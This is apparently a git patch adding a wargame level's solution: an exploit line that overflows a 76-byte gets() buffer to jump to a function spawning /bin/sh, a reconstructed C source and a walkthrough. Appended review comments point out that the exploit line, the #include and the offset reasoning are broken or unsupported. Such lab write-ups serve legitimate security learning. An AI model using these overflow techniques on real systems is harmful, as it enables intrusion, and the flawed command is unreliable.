From abba9a8143ffd1f7874fa47534a492788cef85b3 Mon Sep 17 00:00:00 2001 From: 0x35c Date: Mon, 28 Apr 2025 14:55:09 +0200 Subject: [PATCH] level1 done --- level1/ressources/exploit | 1 + level1/source.c | 9 +++++++++ level1/walkthrough | 9 +++++++++ 3 files changed, 19 insertions(+) create mode 100644 level1/ressources/exploit create mode 100644 level1/source.c create mode 100644 level1/walkthrough diff --git a/level1/ressources/exploit b/level1/ressources/exploit new file mode 100644 index 0000000..7b2f7db --- /dev/null +++ b/level1/ressources/exploit @@ -0,0 +1 @@ +(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1 diff --git a/level1/source.c b/level1/source.c new file mode 100644 index 0000000..5a843c0 --- /dev/null +++ b/level1/source.c @@ -0,0 +1,9 @@ +#include + +int main(void) +{ + char buf[76]; + + gets(buf); + return 0; +} diff --git a/level1/walkthrough b/level1/walkthrough new file mode 100644 index 0000000..b5d0de9 --- /dev/null +++ b/level1/walkthrough @@ -0,0 +1,9 @@ +# Level1 + +Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets`. +We can exploit this call to overflow the stack and call another function. +In the binary, there is a function `run()` located at address 0x8048444 that runs `/bin/sh`. +To exploit this, we can use this sh command with this inline python script: +`(print('a'*76 + "\x44\x84\x04\x08"); cat) | ./level1` +This will print `run()`'s address on the stack, after the buffer being written to by `gets`, resulting in a call to the function. +The parenthesis and the `cat` are mandatory to make it blocking and keep the shell opened.
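Review bot: the one-liner in level1/ressources/exploit is not runnable as written, because `print(...)` is a Python builtin rather than a shell command, so the subshell `(print('a'*76 + "\x44\x84\x04\x08"); cat)` would try to execute a program named `print`, fail, and feed only the output of `cat` to `./level1`. Wrap the payload generator in an interpreter, e.g. `(python -c "print('a'*76 + '\x44\x84\x04\x08')"; cat) | ./level1`, and run it under Python 2 (or, under Python 3, write a `bytes` object via `sys.stdout.buffer.write`), since Python 3's `print` of the str `"\x44\x84\x04\x08"` encodes `\x84` as two UTF-8 bytes and the four-byte address becomes five bytes on the wire. The directory name `ressources` also looks like a typo for `resources`.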
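Review bot: the `#include` line at the top of level1/source.c carries no header name, so the file does not compile as shown; `gets` is declared in `<stdio.h>`, so the line should read `#include <stdio.h>`. Since this file is a reconstruction of what Ghidra decompiled rather than the original source, a one-line comment saying so, and noting that the `run()` function the walkthrough relies on exists in the binary but is never called from `main`, would spare a reader wondering why `run()` is absent here.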
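Review bot: the walkthrough in level1/walkthrough asserts that 76 bytes of padding place `run()`'s address over the saved return address, but the only number on the page is the buffer size (`char buf[76]`); on 32-bit x86 the return address sits past the buffer, the saved `ebp`, and any alignment padding the compiler inserted, so the walkthrough should say how the offset was measured (a cyclic pattern under gdb, or the stack frame layout Ghidra shows) rather than present it as equal to the buffer size. The text also calls the command an "inline python script" although the exploit file never invokes python, and a few wording fixes are due: "This will print `run()`'s address on the stack" should be "write", "The parenthesis" should be "The parentheses", and "keep the shell opened" should be "keep the shell open". It would also help to state why `cat` is needed: without it stdin reaches EOF as soon as the payload is written, so the `/bin/sh` spawned by `run()` exits immediately instead of reading commands.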